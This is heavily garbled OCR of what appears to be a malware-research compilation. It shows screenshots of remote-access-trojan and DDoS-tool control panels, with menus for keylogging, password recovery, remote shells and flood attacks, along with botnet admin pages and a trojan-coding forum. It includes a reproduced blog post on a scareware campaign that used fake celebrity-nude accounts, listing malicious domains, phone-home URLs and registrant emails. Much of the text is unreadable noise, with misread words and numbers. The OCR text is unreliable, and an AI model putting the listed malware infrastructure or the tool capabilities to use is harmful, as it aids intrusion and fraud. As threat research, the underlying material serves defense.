—— J i | oie 

@@aGeXe6.-+t0 if 0 

UpDateIp Config Setting Sereen Session DlWanage Download Uninstall About 

HostList | HomePage 

Remark IP Address Time os CPU 

‘ i" ' 
listening... Part:2009 
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ESN DDOS Attack Sophisticated version of Forum: wee.hackjlla.cn x 


FilelF) site(S) Help) 


Maes as Heitor [tnitor 


ip address?...— System 1 Type —= _ sionory Softwar. . = - State 7 
oOo 127.0.0.1 Microsoft Windows XP 961NB "Bet a2-0420 
iG 


Online host to 


chneea: (select host [Select 2K host [_]selectSP2Host Sophia mot to fo | 
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ESH DDOS Attack Sophisticated version of Forum: wwe. hackjllem.cn > 4 


File(¥) site(S) Help (it) 


Conventional stress-testing Special stress tests Intensity settings thr 
(|syx flood at: (_) vor flood at: (]Specializ:[ ]Gane serv: | |PIN-WAIT atta, 


(_]TCP flood at- [_JICMP flood at- (Jee vari: [JHTTPCache att: [_|IECache 


Target 

Target 

Target 

Target 

Target 
Online 


opal $0 [_]Select host (_JSelect 2K host (J) selectSP2Host ere not to 


ess?7A09H 07:51:50 Welcome to MSN attack software. - 


wwe. hackjlim, cn Copyri ght Sia 
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Exmanoize 


[345] 


MITP Reterer 
sl 
el 
es 
—— 


Exmanoize 
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(> here: 0.143.242 151.6070 
|@ reo sen 223 204 223 0089 
GB Hee revere dagbhadet no 
Nia / renee hyena mo 
hit. //84.16 234 426060 ae 
|@ hee /Mwbemad use no ~—y 
preven 


hit /Acrum ude developers com 
bo / Atta com ute 
@ 


giyyriy 


bite: Mredeate met pevar@rcrway 
Dino /Vewnwe Rokr Come ure 
bite: echo info etemdo 
bp //81 223 254 223600 ue 
Hip wwe mark oct no 
|@ re Heme tweet com geret 
+ cea e869 ad 
NOD (ree redone tehoo COM LTT codeneback @.gmal com 
|@ hee ment community ong LT Teodemeback Bgmad com 
|@ hee the dngthodet no beng 
Nite renee fneab fone res heyboy 
Tever 
heyboy 
Icodemetiack Bigral com 
ue 
Bova ncen 
chaymcre 
doeen 
preven 
Tever 
racndarts 


io //reree redioale ret 

|@ hee nme goweermentiecunty 03 
|@ reps sere aoorcape com 
bite //84. 16. 234 426900 
Neo revere Souhumgon re 
itp: //rewewe ustream by 
No /212 251,143.17 
Nip //euare 


HHH GH 


fFiht! 
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DprClient 
Run-time error ° 372": 
Failed to load control ’CommonDialog’ from comdlg32. ocx. Your version of comdlg32. ocx may be 


outdated. Make sure you are using the version of the control that was provided with your 
application. 
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First execution: 0 
Encrypted path: 0 
Encrypted persist start: Dlzcr2qgZT oSISKOWKMcxJ 1 LJsrwClwKdT (RCimF flr P+PO of U1 SO 4zkx2V<y rB6ihBpJEZeiSE; 


Terminated processes: 


C:\WINDOWS\E xplorer. EXE 
C:\ProgrammeVirtual Machine Additions\wmusrvc. exe 
C:\Programme\ Internet Explorer\iexplore. exe 


Start process | 
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— ee 


4D Daeo soe \a> 


or eee be oe 


0 rn ey 


6 mt emt OD Samy nee ee eto, 
VY ge 


Mow everyone whe has more than S00 poet cam gut tree tent. Contact me vue SOG WOMN7EED 


a-- 


heyy top Diamming hem. | buy © trom hem, and he a onal lngt | have m dont bhame tam he a eget 


(tender | Paren Ineught Zann. ard the have, aed he perve A fir ie after he panement 


he ey Ramerey hem 


— = 
Drm Dre |) ree! UP my ermees | 


Ow Cave Care Gaew- 
——— 
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‘Process Manage |Regetry Manager | U8 Mentor | Remote Shet | Window Manager | Unmtal Manager 
<> Syrtem Punctors Process Name Process Path Threads > eer Doman ore 
Network & Connexion || ff") scroway.ene CiProgan Fles\aded.. 2 04 OwkCoderic PC de. 64015 
Password Recovery — || fF") agaceaey ext C:Windows\pystems2, 2 =~ . 
Remote Mecantig 1 aperercene CiWindows'systendz| 2 = 
Teen Vewer 1) AgpiebcblieDevicese... C: Progam files\tom.. 3 ou 
Be Pie Manager 1 andevocene CiWindowsisystemdz,  S 104 
Cumiate ©) asdevox exe C:yandows'systemsz| 8 1380 
aoe T avovene CiProgam FlesSyit.. 1 por 
4 sapead ©) avodetagtervices2... C: Progen fiestint.. 5 “2 
(Restart Server 1) btagentene CiProgen fiesBme.. § 28 
Updete Server © bdnexe C:\Program fileslode... 11 “a2 
Cone Server 1) bdnexe CiProgan FlesKede,.. 17 “ 
©) Seg server.exe C:Progam files\Code... 4 ™ 
CiProgram Fles\ATI T... pre 


Search Process* 
Mark Unenaert* 


7 
? 
i 


° 
sese*”’*ecruss 


C: Progen Mies Wiird... 
Cinders system 32) 
© Netaccent exe e Pies! a 
Nurrber of running process 190 37 Modules bated for | BSQU Server.exe E 
Process Modses Modse Pet) 


Borland Date Bak teni Locate a Co Wirdows \aisemtly GAC _MSR Borland Gate Blacktea. LoceChet 8.0.0.0 _ 9306 2200 Od D 2, 
OL Server.exe (C:\Program Piles \CodeGear RAD Studo'6.0'be|\ 

BX Seve vesovces. a C:\Program Files CodeGew RAD Sato'é. (ben 

conectiia (Co Wiirowes Wires We _micr cect windows. common-<controls_6995643 44ec!Sdf_6.0.4001.38000_none_S.. 
Batyrrende & CL WWedows Par oso NET Framework 2.0, 90727), 
a a ___ eine bene TT) 
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Process Manager | Regetry Manager 2 Montor Remote Shel | Window Manager | Unital Manager 
Monster | Active 


sus Sera! vokme voksre Name USB Letter Total Seece Free Soace Used Space 
Corrected 1066 97 SyrGearty HO I 2700) ose Rect 
Browser USB 
v¥ Enable Coloration 
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Process Manager | Ragetry Manager UZ Moni Remote Suet | Window Manager | Unewtal Manager 
Montes | Actwe 
Tas & Howe teen Oleconnected ¢ 


Letter * 


Evie: {ROE 
ee i SMR so 
Etec: | uae. 


iat Uoiene 5 -1050nI0007 
ee . 
H 
H 
‘ 


f 


[354] 


24272 


twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
twitter 


twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
twitter 
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.com/LilKimUncensord 
.com/KimKardashian11 
.com/KateWinsletNude 
.com/DeniseRichardsK 
.com/KendraWilkinsol 
.com/CHristinaRicciN 
.com/Shakira nude 


_ Hey there! KateWinsletNude is 
4° veh Twitter. 


t lets you keep in touch with people through 

of ant answers to one sumple ques tion What 
are you u do ng? Join today to start receiving KateWinsletNude's 
updates 


ET” Cl AEE 
re KateWinsletNude 


Kate Winslet nude HERE - CLICK 
ON THE WEBSITE LINK 
BELOW!INTIITITTEIEMIEEN OKE 
http://oymomahon.com/fathul... 


.com/BritneySpears11 
.com/PamelaAndersonO 
.com/kimkardashian3 
.com/BritneySpearse 
.com/LindsayLohannn 
.com/KatieHolmesNud 
.com/LilKimUncensord 
.com/britneyspearst 
.com/LindsayLohanee 
.com/JenniferLovew 
.com/AnnaFarisNnude 
.com/MileyCyrusnud 
.com/carmenelectrasx 
.com/adulttrishstrat 


TTC a SS a - 


Process Manager | Regety Manager USS Monitor 


Widow Manager Uneetal Manager 
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IN" Window(s) 149 Current title | Server | PC-OE-DARKCOOER- DarkCoderS« } 


Server - CodeGear RAD Sudo pour Mr... 


Progen Manager 


Server [PC-OE OAREOODER OarkCoder 


Meru Démarrer 
[ales 0p, akRaght_akBotior] 
nebiraghtivndos 
CP OF NT 


Code a am rm 
Cr NUsers DarkCoderSc Desktop Lrremot 
ep lrag ti ndoe 


Changement de tiche 


C[[LULagppagat 


Normal 
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Cp Aceta (9 


Vator 
Faiee 
tate 
tate 
Faber 
tare 
rave 
haive 
tae 
tase 
hate 
rave 


od 


& Windows Live Messenger x 


Basel 
wient de se connecter 


irerediMal 2.0 


. Mecrosoft Plight Semulietor x 
enidtr 13 
La bote a couleurs version 1.6.14 
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\Qpen urt {Geta} | Remote Commicader { fete} 
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CrProgran Fles\Araiog Oewoes\Core wnantore.ene = HELM OFTWARE Moresofl Windows Curentiens. .. 
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Tear vewer settings 


By 10 Comerica Team Viewer 90 to | www, teamnewer com 


| nec Team Viewer @inataied — v( 41.6172) stated! 


9 lL promme | wl rot Gegaly remote como! some one meth team viewer 


ad 
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Pile Manager Phe Sgttter Manager | Me Search | Netword share beter 
| Pietame 


 aitoewec bet 
__ BeLneestalT0012099.08.25-08.4. 28.log ld 
BdurwetatT 002009 .08.25-08.4. 38 Jog 
ype rectatr0ct2009.08.25-08.4. 28.reg 
dover 


__ s0oTseCT 20K 
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Owe Type 
alii\ Feed 
ae ford 
aid €i\ Feed 
Ora @anom 
se Dem 
at: food 
Folder Name 


g 


yan 


rey 


rin 


ie Maroce Me Sehr Manager | Me Search| Netword share Inter 


Vetsal Chpboard 
Open on Hea Editor 


Fike Splitting 
Acchever Manager 


ComeR 
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Pie Manocer Me Spttter Manager | Me Search | Netword share tater 
— : 


Twe . ‘ 
20 Fes aie = 
alte\ fod mutorerctet «= GdUnrstalTod... SdnretefTool.. Sdunrstalfodl. boomer Soorsict. sax reory log colerbentog corig. sys ve 
uil€i\ Foed 
Brn mam = -- a ‘ 
Be comoM 4 a - = = 
ate rare neetisys ited dat <i heats ek vest 9 
Downlosd/ Upload , 
dL = Delete Fite(x) , 
Recyce Be Fae Acbon , 
Fle Attnbute , 
Go to file search 
Virtual Clipboard , 
1) 
Open co tex Edtor 
Fae Spitting , Spt Selected File 


Archever Manager 
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Hey there! KendraWilkinso1 is 
using Twitter. 


Alveady using Twitter 


Twitter is a free service that lets you keep in touch with people through tom vou shese? Cich hee 


the exchange of quick, frequent answers to one simple question: What 
are you doing? Join today to start receiving KendraWilkinsot1's 
updates. 


a KendraWilkinso1 


Kendra Wilkinson nude HERE - ald 
CLICK ON THE WEBSITE LINK 
VV ETT ETE) Oke 
http://bit.ly/Je2Sd 
AD ae 
er a 


As in previous campaign, their redirectors continue working - excluding oymomahon .com 
which is down - and serving newly typosquatted scareware domains. For instance showmeall- 
tube .com/fathulla/13.html (64.92.170.135; 216.32.83.110) which is exclusively used on all 
the bogus accounts redirects to myhealtharea .cn/in.cgi?14 (64.92.170.135; 216.32.83.110), 
again Layered Technologies, Inc. 


The same goes for the second domain, delshikandco .com/paqi-video/30.html (216.32.83.104) 
Email: alexeyvas@safe-mail.net ([4]multiple scareware domains registered under the same 
email) as well as [5Janother redirector maintained by them used in previous campaign, 
ntlligent .info/tds/in.cgi (72.232.163.171) also both hosted at Layered Technologies, Inc.. 
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Open on bHex Editor 
Fike Splitting 
Aechover Manager 


Pie Manecer Me Spttter Manager | Me Search | Netword share tater 


Cae _ Two ea) oa ) 
20 Fed —_ 
aloe\ Foe mtorunc.bat Gdurrstaifod...  — SdunnntafToo!.. OdunestalTod... beotng SOOTSECT. BAK Greeny Jog colerben tog 
al€i\ Faed 
@eom an ’ = -_ a . on . a . 
Ger wan a) gt _m}__mizi i ai 
any rows origars ow —_ ana $65005.575 pagetie vs testico 
Downloed/Uplond > 
hb - Ca Delete Filets) , 
Recyce Be, | = File Action » 
Fide Atte . 
Go to Me seach 
Versal Chpboard , Cua cheched fies Chit Alte 
' 
saa Ge Bla ha Copy checked fies Ctrl ARC 
Pee 5 Pat Fels) Cote Ane 
Aachever Manager . 
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le Manager | Mie Spitier Manager | Pe Search "etword share tater 


Tyre Permason Max were Curent User Comment Pactword Reserved 
24M 0 LHS 0 Adare? enor 4 Os. Ss aad 6 

° ° Ler ° afm of~ 2 
2M o HTS 6 Pertage ow Gift Ss ad 6 
2S ° Loner ° Pactage par Géfmt +t ° 
2M ° Hens 0 Pertage or Gift aad 6 

° ° ‘ ° Gartcodersc -t- ° 

° 0 HBTS o =~ aad 2 
Pio ° ners ° Partage par défat -—- ° 
24S 0 HTS iJ PC dstant - ° 

° ° ers ° -- -- 2 
° © 4 0 eo a aad ° 

° ° <r ° ae a 2 
® o LHS 6 —- Ss aad i 
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1: Screen Shot pg 
2) Screen Shot HD 
If 31 Screen Shot Gat 
4) Screen Shat Png 
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Cigtoard Manager 


Reteshed Tee 
4403 Test 
eM Text 
242406 Piet) 


Flenene a 
_) eben DartCodersc\ Desktop bug? ot 

CO Uiers DariCoders< Desimp tom Brry_92.00 

__) Cr eners DartCoders< Desktop |fcon Brtry_Giico | 
be O ters DariCodersc Desktop 1.9 

ee Co Were DartCoders< Desking pc? pp 

eC Users DeriCoderic Desimp oc? pp 

eC: Wners DartCoderse Desking plop 
me © Users DariCoderSc Desktop 99 9 
ee Co Users DartCoders< Desking pc 11 
eC Users DariCodersc Desitop ox 17 po 
CM nee inter enktinnine It on 
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Cigtoard Manager 


Reteshed Tyee Prewew Content Tate ale 
241407 Test | test he Goboad manage 00 R 
een Text 

4s 


eqoetregtuefoegrefanguetonguiegregoegy... 136 
Fiets) 


Ci sens DariCoderSc (Destin Dug? iC: Users, ou 


[Ooboend test coment] 
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Ete Et View Project Farrrat Detwg Bur Query Ojegen Jeol Aatins Videw telp 
B-s- Baa @aom > eN@ASRAD DH raw fives 
x 


Propet - Clmatind Steam Pmainer xj 
oma 
= DE Cewek steam Phauher (Shin veg) 
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Erreur socket Windows ; An operation on 3 socket could not be performed because the system lacked sufficient 
buffer space or because 4 queue was Full (10055), evec PAPI ‘connect’ 
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OpenSC.ws 


Trojan coders shortcut t 


@ Bosic/Vivual Basic 
© Pascal/Delphi 
C Chee 


lio 
Program) Options@) State) Help 


File Screen Audio 


LAF IP 


Program start-up tine: O9Tear(2noorl6Day 23: 


_ 
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MS-DRTRemote Trojan Beta 2.0 LocallP 192. 168. 1.253 


Conputer Fane OS crv 


Obfuscator b 


Begin UB.Fornm Forni 
Caption 
ClientHeight 
ClientLeft 
ClientTop 
Clientwiath . 
BeginProperty Font 

Hane 
Size 9.75 
Charset 6 
Weight 
Underline 
Italic 
Strikethrough 
EndProperty 
LinkTopic 
NaxButton 
NinButton 
ScaleHeight 
Scalewidth 


2565 
4BAS 
a4a70 
358s 


Begin UB.CommandButton Commandt 


Caption - 

Oefault bd 

BeginProperty Font 
Nane 
Size 
Charset 6 
Weight 460 
Underline 6 
Italic 8 
Strikethrough 

EndProperty 

Height 

Left 

Tabindex 

Top 

Width 
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“X and Zero” 


“MS Sans Serif” 


“MS Sans Serif™ 
8.25 


‘False 
‘False 
‘False 


BaGeaR OSE 


VideoView UpdateIP 


Build Pop news About Exit 


Ping Video Ste Version 


Uninstall &) 


Prank-related @) Disconnect @) 
Docunent Management (F) off] 

Screen Monitor (C) Restart (§) 
Remote Terminal (I) Shutdown (S) 


Keylogger K) 

System Settings 

Video Surveillance ¥) 
Voice Monitor &) 
Download Running @) 
Update @) 

Open 3399 port @) 

Visi tWebsite Y) > 
Clear Log) 

Change Notes (R) 


Select All @) 
Deselect &) 
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b/s Receive: 0.00 kb/s Listen port: 2X LEH: 1 


Free Adult Movie 


@ FULL REVIEW @ FULL REVIEW @ FULL REVIEW ™ FULL REVIEW = FULL REVIEW 


The new scareware domains used in the first redirection: 
nusecurityshields .com - 91.213.29.252 - [6]FakeAlert-WinwebSecurity.gen 
besecurepctrue .com 

wesecurepcs .com 

securityverpcs .com 

allsecuredpcshields .com 

myrealsecuritys .com 

realsecurityspot .com 

allentruesecurity .com 


The second redirection leads to thetubesmovie' .com/xplaymovie.php?id=40012— - 
216.240.143.7 - Email: queeziegl@gmail.com where onlinemovies.40012.exe ([7]Tro- 
jan.Crypt.ZPACK.Gen) is served, which upon execution phones back to myart- 
gallery .com/senm.php?data= (64.27.5.202) Email: jnthndni@gmail.com; _robert-art 
.com/senm.php?data= (66.199.229.229) Email: robesha@gmail.com; and superarthome 
.com/senm.php?data= (216.240.146.119) Email: chucjack@gmail.com. Yet another redirector 
at showmeall-tube-xx .com/xtube.htm - 78.159.98.70 - Email: crashtestdanger@mail.ru 
attempts to download more scareware from showmeall-tube-xx .com/setup.exe - [8]Tro- 
jan:Win32/Winwebsec. 


Parked on 216.240.143.7 are also: 
2432 


Type 

Server Connexion 
Conmemon Host 
Connexion Port 


Server General informabon 


veer SD 

Mac Adress 

8905 Infermuben 
Dos Date 

Bea 1D 

Bes Type 

Bos Vendor 
Server Editce Setting: 
Process Miter 
Server Path 

HEY retal 
Server Iretal 
AcSvil neta 

Ant vetual box 
Hide Server 

tide Folder 

Hide Process 
Protect Process: 


13s 
AT/AT COMPATIE 
56 Party 17 Model 3 Steppe } 


eG ETE 


[377] 


24293 


Process Manager 


Process Name Process Path Threads 
Normal Pnorty 

Hegant Prepeay 
E) corss.ene fae = 

wwe Cw, Process 

} Ownvene Coun ‘itt Selected Modules 
E) MOORS. DE ce 
1) wetogon.exe cry Download process 
Low Preoety Search Process” 


] Sear re merosr eve ae Marky Uneark* 


Tl) Searcthy omcebwst wer 
Undnow - Other yore 

) enon ewe Cryer, Clean Lints 

E) servoes.ene CiWindows'systend2\ 7 
onas-eme \SysemRoet System) 4 


Number of running process 190 0 Modules listed for --/-~ 
Process Modues 
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|Ragatry Manager | Ui Montor | Remote Shel | Window Manager | Unratal Manager 
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us 
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User Comey Peet P= 
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SO. 1160 93920 tage 
ae wa 842 tight 
SYSTEMIATORITE - = rial a 
v @ 334880 tight 


. 
ce a8 
wm Free) 
nT 4 ° 


pd acess Manager | Regety Manager | Us Montor | Remote Shel Wrcdow Manager | Urwatal Manager 


& Comma Punctors |i Windew(s) S41 Current tiie 
Window Tite Sue Monde Nt OweG) vetee od 
Veteble WW choves * 
Odearrer Normal ee . ™e t) 
Server [POLE OARECODER OwriCoder,.. Maximned 1s is Te 
Urremote Network Admweer enon Tool ¥... Normal 9M 2 ™ 
Server - CodeGew RAD Saude pow Mar... Mewared me 2 Te 
Windows Live Messenger Nora 26587 3 ™e 
“SMTSTR Derdutloremel t> Noreet de682 ) Te 
Opera. » Trojan programming fore Mrwared hhhs 2 ™e 
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pate jon Raters Windows s we 
MeteD Norwest 9 ™e 
Verdires Suet Nore! Sungle Achon , ° ™e 
Chere - Codetew RAD Saute pou Mae... Merwmned Options >| ¥ Cupley in groups 2 ™e 
Ke sFFOORRIALOIIA) Cr ien <choo... Mewared 5 Tue 
Cormectng at Ridp V4 2 (Vindows 5... Mewared Renarne Selected 3 ™ 
Sans tre - Pant Mrwared 6 Te 
Program Manager none Gnu 1 me 
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“ Sse 
Fae F ise 
oe 
VF ote Fate 
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6mere we 
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19.0.9290 
32.0.79.0 
995.0,1220 
10.840 
679470 
905.0.250.0 
1340,908.0 
1.0840 
1140,320 
309.0.97.0 
W010 
010.150 
$10.520 
733.0.136.0 
WOH 
13.0.30.0 
200.010 
1.0.40 
14100 
670.1110 


Remcte Address 


0809 
0.0.0.0 
0909 
0.0.0.0 
0009 
0.0.0.0 
09090 
0.0.0.0 
0009 
0.0.0.0 
0009 
127.0.9.3 
0949 
0.0.0.0 
0909 
0.0.0.0 
0909 
127.0.0.2 
270a4 
127.0.8.3 
0909 
44942 
65.54, 172.245 
6S.SA172.75 
207.46, 125,52 
7708.80.90 
124.0,205.0 
208.0.46.0 
10.510 
217.0.302.0 
118.0.320 
134.0.1310 
1110,1140 
124.0.97.0 
10.540 
020.130 
A770 
905.0.130.0 
10.540 
010.130 
708.0. 708.0 
40.530 
10.00 
124.0,909.0 
18.0440 
1%5.0.78.0 
BOIMD 
390.0. 300.0 
134.0.1%0 
D149 
80,050 
720.2920 
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~ Peed fetes [ace P| (Ramee Comnoacer (Geta) 


> Sytem Purctors al = Coe) 
Password Recovery ViPrevien the webate 


* Trojans & Malwares | | Source codes | © turks 


OpenSC.ws 


= AES 2/9 | 
19:49 <Ureegistered> need zeus installation tut ia 

+ 19:04 <Empty> Last post. | 

> 19:03 <Empty> ed time I'm asking, 1 can’t seem to find the solution. Topic: bitp://wew cosnsc .ws/delphi-hele/777...- \" 

2 18:18 aDemenz> eye iter peeote €y) 

2 17:45 <619> theks 


+ 17:39 <{Zombie)> Cool, Questions are now comsidered Trojan & Matware releases, 
bitte ://nnny epensc wes trojan: matware-...n-bifrost btm! 


tcome to the Opensc.ws - Trojan programming forum 


(PM), respond 
So please, join our community today! Please REGISTER. If you have any problems with the registration process or your account login, please 


Contact contact support. 


Opensc.ws 


forum Laut Pout 


oH 
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Commend \ecaton 


Ci Progra Files Gyraptcs Gyn TP Gynt Pin exe MEUM OFTWARE Marr oso Windows Ourentviers: .. 
“Ci Progran Pies \ATl Tecrotoges ATLACE\KCore-... HUM SOFTWARE Morosoft Windows Kurentiens:.. 
Ci Progran Files\Analog Dewices\Core wnantorm.ene HELM GOFT WARE Mc csoft Windows Curentiers. .. 
Ci Progra Files raion Devices\GouraN ound. HELM OFTWARE Mo cso indons Curertvers... 
CiProgran Fles'tentett Packard? Quick Laud)... HELM OFTWARE Macrcsoft Windows urentiers. .. 
Ci Program Files tentett Packet? Wireless Asse... 
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Pie Maracer ie Spltter Manager | Pe Search | Netword share beter 
CAlosdPe\ 
Fleniame Fle Type Fle Sze 


Owe Twe 

le) fond iettolsp aechee WeRAR IP 76S 
ON Foes | 2» Neder WHRAR TP be 
aile:\ ford 
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| @ Server | PC-DE-DARKCOOER-DerktCoderS< | 


@ Seve Wtreotons Vous Bese St Banh Sort Asem 
> ConrelFun Fuctons 5 
Suiaenien Script weccevfull compileds‘nan | 
ae’ Marcus Are 


fie eteort A Coven 
DarkCoderse ead this point , Gent forget to pot INCL 


> = oe : or you have other problems , pleese contact 
& Tea viewer 

el Fle Manager 

K Communication format PE G 

BD Sov Rrxrors entry codestart 


an Soros 
windle.ine* 


bi 


ey 
' 


‘ 


‘ 


eeeeee’s 


' 


RESRRR: 


*'s 
3 


Device Mumber -> It can range from 0 through 9 


Frames per second. Most be O/T58. Z.q. 10 WHS = &0 
date readable writeable 
hinetaace 
nlepcam 
section * * @ode readable executable 
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‘how Monitor Pate Speca Puxtors Configure Ghackint 


(Cert Setting (Tota 


Maus Ooerionder [Human Servers Oty) | 


% httpc /urremote.or gAupdiabe exe 
Save | ci Lodate eve 
© Amen serves 


7 Oaplay cumber of connected every 
® Se 
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Server extenson [To Cvange « after budd just rename with) he new one] 


coe bet on “7 of 


Fraisston 
Server Name | OarkCoderSe-tietwork! 


Mtex: MUTEX_UR_NATS 


go-go-tube.com - Email: consanch@gmail.com 
thetubesmovie.com - Email: queeziegl@gmail.com 
tubessite.com - Email: roberkimb@gmail.com 
besttubetech.com - Email: tashcham@gmail.com 
supertubetop.com - Email: queeziegl@gmail.com 
yourtubetop.com - Email: tashcham@gmail.com 
greattubetop.com - Email: roberkimb@gmail.com 
fillcorp.com 

my-tube-dot.com - Email: consanch@gmail.com 


® Books | Butiness | Acadernic | More + 
(_)Scribd =a 
mes 
Log in | Sign Up | Help 
Home Explore tT) Upload Partners Store New 
Eva_Mendes naked 

Search MASE NEKO SOx DON Video pics, desmntas EXCLUSIVE 
Search within Eva_ Mende Eva Mendes naked HERE - CLICK ON THE WEBSITE LINK BELOVaieniiiemiiienitt 
naked’s document 


OOocurents 
& Add Eva_Mendes naked as 


a fnend 


Recent Documents 
Collections 


BASIC INFO No collections 


Name: 
Eva Mendes Comments 
Ayes 
27 


No comments 


Gerder: 
Female 


Website: 
““ntipJshowmealiiube compaq 


video!4 Fim 2,443 views 


The newly registered Scribd and LinkedIn accounts also point to these very same domains. 
Bogus Scribd accounts - approximately a thousand - participating in the campaign: 
scribd .com/Eva_ Mendes %20naked 

scribd .com/Kim Kardashian %20sex %20tape %20free 

scribd .com/Nude %20wrestling 

scribd .com/KimKardashianSex %20Tape 

scribd .com/BritneySpears %20Sex %20Tape 

scribd .com/HollyMadison Naked 

scribd .com/Free %20Animal %20Sex %20Videos 

scribd.com/BritneySpearsCircus 

scribd .com/Emma %20Watson %20kissingsomeone 

scribd .com/Paris %20Hilton %20 %20sex %20tape 

scribd .com/Ellen %20degeneresgay 

scribd .com/Gallery %20o0f %20Lindsay Lohan 
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¢-3-@G6 
@ Debuter avec Fretox E] Ate une 
Lj CP 2 Semenany statistics GLB Tete ct internet - Googie Traducti. 8% Openscans - Trojan programming 5 (7 * 5 & Trojan & malware releases - Opens.) * 


Information: 


Piel 
OMT date: 09.09.2009 Tote! reports > éetebere: 
GMT time: O2128i25 Time of first ectrwty: 

otiticn: 1 Tote! bots! 

Totel active bots in 24 hours 

Minumet version of bet: 

Maxime! version of bet: 
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fichier Edition affichage Huterque Merquepages Outis 
@-3-@56 


@ Debuter aver Firefox ED At une 


‘Gert date: 09.09.2009 Operation systems Linux 2.6.28-10.7intel IG. Bump @3 SMP The Aug 13 21152124 MOT 2008, xB6_44 
OMT times 01/2513 


Moailia/S.0 (Windows) Uy Windows NT 6.2) fry vit @.2.20) Geckos 20081227 Fweten/2.0. 20 
} 
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Total reports in database: 
Time of first activity: 

Total bots: 

Total active bots in 24 hours: 
Minimal version of bot: 
Maximal version of bot: 


Botnet: FEB 


Installs (0) 
MySQL error: Invalid use of group function || MySQL error: Invalid use of group function 
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Total reports in database: 
Time of first activity: 

Total bots: 

Total active bots in 24 hours: 
Minimal version of bot: 
Maximal version of bot: 


Botnet: FEU 


Action Reset Installs 
Installs (0) 


MySQL error: Invalid use of group function || MySQL error: Invalid use of group function 
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MiS-DRTI-Renotetsojanbeta22 Local |P=j9246835 253: O20 Os 


Program(F) Options(@) State (¥) Help GD 


BESG00FaEN 


File Sereen Audio VideoView UpdeteIP Build Pop news About Exit 


On-line WAN IP LAN IP ComputerNane 05 cru Ping VideoStat Version 


Program start-up time: O9YearO09noonl2Day 17:11:23 Send: 0.00 kb/s Receive: 0.00 kb/s Listen port: 87f On-line host: 0 
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| \ Server [ 4432156-tdfal ] ioe | 


@ Server Informations 
& Control/Fun Functions 
System Functions 

Network & Connexion 
Password Recovery 
oy. Remote Msconfig 
§ Team Viewer 
File Manager 
. Communication 
Spy Functions 
| Run Scripts 
Misc Functions 
J 8500 Bomb 


oo MM) Restart Socket 
(i) Restart Server 

Update Server 
of) Close Server 
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Personal Network Administration Tool 


x 
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Main Contacts Help 


| 


Contacts 

> Coworkers (0) 

> Family (0) 

> Friends (0) 

v Other Contacts (8) 


& ACER-2921493C02 - Adminn - Program Manager 
By ACER-S63SS8FE6F - git duell - Screen Saver 
& ARBETSRUMMET - Elsa och Nils - Google - Mozilla Firefox 
& COMLINKRBY 1 - Fredrik. - 
_ GB} DELL -Rogetta -Porn Tube Search > Smells , Page 1 - Windows Internet Explorer 


& ESPENSIN -langedrag -D: \utorrent\ferdige Groune Other Contacts 
& INSPIRATION - Eva -Fishdom - Windows Internet Explo| Name: DELL - - Rogetta 
2B WINGS -lana - [02378EEE.ru - Microsoft Internet Expl Computer: DELL 
|User: Rogetta 
Lan: 192.168.1.2 
& Downstairs - Admin - Farmville on Facebook - Windows Ii Wan; 
& Laptop - Vanguard Remote Administration - 10/18 Users) paca b eek Windows XP 
Offi ountry: Un ates 
2 (8) fpescals English 
|Webcam: Not Detected 
Version: 0.1 


v Test Servers (2) 


Porn Tube Search > Smells , Page 1 - Windows Internet Explorer 


Porn Tube Search - Free Porn Videos Search, Free Porn, Porno - windows Inter 


16/09/2009 04:45:06 PM 
16/09/2009 04:43:50 PM 
16/09/2009 04:43:48 PM 


YouTube - Gwar Murders Muse on tom green live - Windows Internet Explorer 
YouTube - Tokio hotel & GWAR - Windows Internet Explorer 
YouTube - Interview with Dave Brockie of GWAR - Windows Internet Explorer 
Video: Police Terrorism [Hood News Documentary][1 Hour Long] - Windows Inte = 
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fe iexplore. exe: 1232 TCP 4432156:2068 localhost:8587 
Vanquard. exe: 3884 TCP 4432156:8587 localhost:2107 
iexplore. exe: 1232 TEP 4432156: 2082 localhost:8587 
Vanquard.exe:3884 TCP 4432156:8587 localhost:2068 
iexplore. exe: 1232 TCP 4432156:2107 localhost:8587 
Vanguard. exe: 3884 TCP 4432156:8587 localhost:2150 
iexplore. exe: 1232 TCP 4432156:2124 localhost:8587 
Vanguard. exe: 3884 TCP 4432156:8587 localhost:2124 
iexplore.exe: 1232 TCP 4432156:2136 localhost:8587 
Vanquard. exe: 3884 TCP 4432156:8587 localhost:2082 
iexplore. exe: 1232 TCP 4432156:2150 localhost:8587 
Vanquard.exe:3884 TCP 4432156:8587 localhost:2161 
iexplore. exe: 1232 TCP 4432156:2161 localhost:8587 
* Vanquard. exe: 3884 TCP 4432156:8587 localhost:2136 


ESTABLISHED 
ESTABLISHED 
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linkedin .com/pub/anneliese-van-der-pol-nude/14/150/371 
linkedin .com/pub/disney-s-raven-symone-nude/14/150/604 
linkedin .com/pub/jennifer-love-hewitt/13/ab6/396 
linkedin .com/pub/free-nude-celebs/14/6b/65b 

linkedin .com/in/nudetubee 

linkedin .com/in/nudepics2 

linkedin .com/in/freenudecelebrities1 

linkedin .com/in/nudecelebrities1 

linkedin .com/in/nudephotos1 

linkedin .com/pub/nude-art/14/6b/6a 


The statistics from two of the bit.ly URLs showcase how the campaign scaled due to the 
number of bogus accounts, and they virtually disappeared upon notifying the affected parties 
which removed the accounts in less than an hour. The gang keeps making a point that | made 
a while ago - a single group can dominate the entire Web 2.0 threatscape, automatically if 
they want to. 


This post has been reproduced from [9]Dancho Danchev'’s blog. 
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UPDATE2: New binaries are hosted at web.reg .md/1/[1]pdrv.exe; web.reg 
-.md/1/[2]pp.10.exe and at web.reg .md/1/[3]fb.49.exe. 


UPDATE: The Koobface gang is [4]upgrading the command and control infrastructure in 
response to the positive ROI out of the takedown activities. This of course doesn’t mean that 
enough evidence on "who’s who" behind Koobface and a huge percentage of the currently 
active malware campaigns targeting Web 2.0 properties hasn’t been gathered already. 
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Uptime 
Satus Connected 


Received 


<Tuesday, July 8 12-06AM> HOC v1.0 Created B 
<Tuesday July 8 1:19PM>: Waking forintal butter fron 
<Tuesday, July 8 1:19PM>: Connection on socket: 696 from [Admin @ SERB PAL] has been accepted!!! 
<Tuesday. July 8 2:56PM>: incomming Command From Admin - Command: INFO - Processing command 
<Tuesday, July 8 2:56PM NFOUser: Admin Computer: PAL - Recv'd: 512 Bytes From: Admin 
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AmmLab-VS 
antivir 
Authentius 
Avast 

AVG 
BiwWefender 
